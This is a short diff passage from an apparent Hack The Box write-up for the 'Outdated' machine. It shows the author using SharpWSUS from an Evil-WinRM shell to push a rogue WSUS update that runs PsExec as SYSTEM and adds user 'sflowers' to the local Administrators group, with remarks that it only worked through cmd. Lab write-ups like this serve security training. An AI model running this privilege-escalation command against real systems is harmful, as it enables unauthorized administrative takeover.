Rogue-1/HTB/Machines/Outdated.md

 ****  Online  ****
 CertUtil: -URLCache command completed successfully.
 ```
+Now we will run the sharpwsus to create an update that will allow us to gain membership to the Administrators group.

+Note: This exploit was executing perfectly and everything looked good but I was unable to gain membership.
+Oddly changing to CMD worked first try.
+Still unsure why.

 ```console
 *Evil-WinRM* PS C:\temp> cmd.exe 'sharpwsus.exe create /payload:"C:\Users\sflowers\Desktop\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c \"net localgroup administrators sflowers /add\"" /title:"rogue"'